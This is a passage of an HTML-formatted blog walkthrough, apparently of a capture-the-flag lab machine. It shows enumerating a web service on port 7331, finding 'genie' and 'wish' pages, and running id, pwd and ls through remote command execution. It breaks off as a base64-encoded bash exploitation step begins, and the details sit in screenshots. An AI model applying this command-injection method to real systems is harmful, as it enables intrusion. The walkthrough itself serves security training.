&lt;b&gt;creds.txt, game.txt&lt;/b&gt; and &lt;b&gt;message.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFrQLVQI2-XaC7z7W8hNrO60E3il6tcEKHvrCkBFmeRJKTtN0jZUlR-577Gz0mF1UqH2CUWcrkACYLRxq9NcMy35-ibi10vyV33eT_XjBYl9rjqdVe_3QJjJyTVh_-q5IaZDi2jH9cC6unp4oI1JL54XKHvngnkk92TiruIyHu2jmd4R98oTjj0tRXFA=s761&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;417&quot; data-original-width=&quot;761&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFrQLVQI2-XaC7z7W8hNrO60E3il6tcEKHvrCkBFmeRJKTtN0jZUlR-577Gz0mF1UqH2CUWcrkACYLRxq9NcMy35-ibi10vyV33eT_XjBYl9rjqdVe_3QJjJyTVh_-q5IaZDi2jH9cC6unp4oI1JL54XKHvngnkk92TiruIyHu2jmd4R98oTjj0tRXFA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading the 3 files:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh-66TRAyRFcSgYo8Mxfgdm9yvG07WdijdRERaFYTJOrFc-gzCNm6w0K6ysF4dpw654U6YctUj78rJxzi6OD6iBeKOAZlRvgecKS7xjyUgjx6lM5-e5sTa3k4lTaPreT3Mgh16yMarZuLNQrpFm0ol2x03qpjpkYzbazGH2fVSNcsjNfbyrSbVc_L0B9A=s1071&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;323&quot; data-original-width=&quot;1071&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh-66TRAyRFcSgYo8Mxfgdm9yvG07WdijdRERaFYTJOrFc-gzCNm6w0K6ysF4dpw654U6YctUj78rJxzi6OD6iBeKOAZlRvgecKS7xjyUgjx6lM5-e5sTa3k4lTaPreT3Mgh16yMarZuLNQrpFm0ol2x03qpjpkYzbazGH2fVSNcsjNfbyrSbVc_L0B9A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to web browser at port 7331:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj-2Y-nfUGPmX0xTa5GvI5fqMVLa24rKA3ydef1lc9P5qBAN6UbgTPqcvlvDGh9wsj2HZWnLCLXNdl_SDURy5Qt8jiz5dxLJdqc3bjMOuz-kSSG3BlGNfvg0Zl2vyoiuW-0y0mbuuoLyd18YUOr92hqHehLeDWtY0YTqPbLnt-v6SyM7hVMiXwgqEHXrg=s583&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;427&quot; data-original-width=&quot;583&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj-2Y-nfUGPmX0xTa5GvI5fqMVLa24rKA3ydef1lc9P5qBAN6UbgTPqcvlvDGh9wsj2HZWnLCLXNdl_SDURy5Qt8jiz5dxLJdqc3bjMOuz-kSSG3BlGNfvg0Zl2vyoiuW-0y0mbuuoLyd18YUOr92hqHehLeDWtY0YTqPbLnt-v6SyM7hVMiXwgqEHXrg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting port 7331 we find web pages &lt;b&gt;genie&lt;/b&gt; and &lt;b&gt;wish&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3YmhzMR96yFKj0OH9wWl3lnrl2rFChSLyUhz4dUvLynyauRci0-9IjQx_lQGi7VpyGsn5cO9gD-kX4-a2bXhTfnUm7VegSO0dxLWJ6kEeTjkT9tA2jcvpqZRXzmgMV92PuXJY0WpLSi2t/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;443&quot; data-original-width=&quot;751&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3YmhzMR96yFKj0OH9wWl3lnrl2rFChSLyUhz4dUvLynyauRci0-9IjQx_lQGi7VpyGsn5cO9gD-kX4-a2bXhTfnUm7VegSO0dxLWJ6kEeTjkT9tA2jcvpqZRXzmgMV92PuXJY0WpLSi2t/s16000/screenshot.15.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to&amp;nbsp;&lt;b&gt;genie&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzlKQ7-WYX8BnDqpEz4jy9Qlq8TGk3x3lO8uN-TL7Q9FW99W1-8q9OuA7GT_EZZWtqqRS0gN51y0TD806kKFJox4ciA53_NUWGAmEjScvvZXQhqjmO8eUNEU5PraAWreIQmY1u2FXn_pT9/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;742&quot; data-original-width=&quot;771&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzlKQ7-WYX8BnDqpEz4jy9Qlq8TGk3x3lO8uN-TL7Q9FW99W1-8q9OuA7GT_EZZWtqqRS0gN51y0TD806kKFJox4ciA53_NUWGAmEjScvvZXQhqjmO8eUNEU5PraAWreIQmY1u2FXn_pT9/s16000/screenshot.14.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;- Connecting to &lt;b&gt;wish&lt;/b&gt;:&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCVHWWryTK_ZvIRLebR_QVZiHdYmlthpQEPPvIG5hAgXnsRkvKGjtG_nnKvKAfxYR8J9Sa1_4UtQMbp6sYiPyB9hR1wxocI16KeDU-7UwFL2iTG_Hfcc3896WMeWn1cDp6hYSYt25INzMk/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;267&quot; data-original-width=&quot;410&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCVHWWryTK_ZvIRLebR_QVZiHdYmlthpQEPPvIG5hAgXnsRkvKGjtG_nnKvKAfxYR8J9Sa1_4UtQMbp6sYiPyB9hR1wxocI16KeDU-7UwFL2iTG_Hfcc3896WMeWn1cDp6hYSYt25INzMk/s16000/screenshot.16.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Executing command &lt;b&gt;id&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKqxMOOA-6Lpiw47SjSC30jpbSPkTOt6C3wjQV1JLo66k1iAj_1XiP0iKP5iQm0HCq9xmLBCLM6kU7gtI5TsYsr5te15NUxrdbwl31CiyYG5PsP0vvlqQX_Mudu0uKb_s_L0pnlN_OPRS6/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;261&quot; data-original-width=&quot;487&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKqxMOOA-6Lpiw47SjSC30jpbSPkTOt6C3wjQV1JLo66k1iAj_1XiP0iKP5iQm0HCq9xmLBCLM6kU7gtI5TsYsr5te15NUxrdbwl31CiyYG5PsP0vvlqQX_Mudu0uKb_s_L0pnlN_OPRS6/s16000/screenshot.17.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The server redirects to web page&amp;nbsp;&lt;b&gt;genie&lt;/b&gt; and outputs answer at URL:&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcqNoCRjfmYQUXl7xgIft-BXU9dAd-1X8nVpN4xyEdL7Asdl3kMtteqWFWys6oub1Z7UJ-YUQF2z-vBDiR7PRfsm78JiixxO8MEzz7NsGMMbgcMHaP2OEWiGhoyCUlqO5_gk-LciicpI71/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;716&quot; data-original-width=&quot;845&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcqNoCRjfmYQUXl7xgIft-BXU9dAd-1X8nVpN4xyEdL7Asdl3kMtteqWFWys6oub1Z7UJ-YUQF2z-vBDiR7PRfsm78JiixxO8MEzz7NsGMMbgcMHaP2OEWiGhoyCUlqO5_gk-LciicpI71/s16000/screenshot.18.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Same thing for command &lt;b&gt;pwd&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0_HSp-NL05qGuYIZxg2dJlGWg-YY6o7FtUkpdmBoVLJQZlOWWUhMfdTLHLT5G4Qk3pB49-1oC00ZcyuOApp4LOW7sWnHRPe7oQLfMqM9QyKQx_BphyphenhyphenlicFFzcjJ_YltvZORd6b4UI_qcw/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;266&quot; data-original-width=&quot;511&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0_HSp-NL05qGuYIZxg2dJlGWg-YY6o7FtUkpdmBoVLJQZlOWWUhMfdTLHLT5G4Qk3pB49-1oC00ZcyuOApp4LOW7sWnHRPe7oQLfMqM9QyKQx_BphyphenhyphenlicFFzcjJ_YltvZORd6b4UI_qcw/s16000/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDjVGjbAg6aS_4DBSZRkIKE3WOkaHoOlaUx-mJUHewiqwnjrqn0Pq8FrMg8_5-tL8Gg6o5I5oflhBvopeWZ6ZQ8MbTWvvj_9oc6irp5w_eaWnsVeaAEypKGAucm7CL-avY8MElXlbEUp_l/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;386&quot; data-original-width=&quot;458&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDjVGjbAg6aS_4DBSZRkIKE3WOkaHoOlaUx-mJUHewiqwnjrqn0Pq8FrMg8_5-tL8Gg6o5I5oflhBvopeWZ6ZQ8MbTWvvj_9oc6irp5w_eaWnsVeaAEypKGAucm7CL-avY8MElXlbEUp_l/s16000/screenshot.21.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Same thing for command &lt;b&gt;ls&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1KZIYoMU_0XHmplTbEWTH-Qi6PUmrpZgZRL-y9KwxWoLlpEAXGEMjB0JiiRyEIXFhJv-Yxz3Wsv-8PaLyV3nEnT41yC6l5tT2cwNEODkuCz5wRCJUKwm6temrUIpcbuG7pFMEUqI4RGXV/&quot; style=&quot;clear: left; display: inline; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;269&quot; data-original-width=&quot;491&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1KZIYoMU_0XHmplTbEWTH-Qi6PUmrpZgZRL-y9KwxWoLlpEAXGEMjB0JiiRyEIXFhJv-Yxz3Wsv-8PaLyV3nEnT41yC6l5tT2cwNEODkuCz5wRCJUKwm6temrUIpcbuG7pFMEUqI4RGXV/s16000/screenshot.22.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdhjXpXIGhokq7KqPLxu7OCvmHKG0T1_qdIzon66FnOqet9acAb7qE183lDRjTqI35DO2BvwTabVRVCBtLOr1Pb7JcSxn6WMSuACeCx0KyYNEZ_fW6zRtc94o7gwvQ4gIh0zcVXHkIIqhu/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;340&quot; data-original-width=&quot;678&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdhjXpXIGhokq7KqPLxu7OCvmHKG0T1_qdIzon66FnOqet9acAb7qE183lDRjTqI35DO2BvwTabVRVCBtLOr1Pb7JcSxn6WMSuACeCx0KyYNEZ_fW6zRtc94o7gwvQ4gIh0zcVXHkIIqhu/s16000/screenshot.23.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- One potential vector attack&amp;nbsp; would be to execute remotely a bash command at &lt;b&gt;wish&lt;/b&gt; web page.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The bash command is&amp;nbsp;encoded with base64:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a 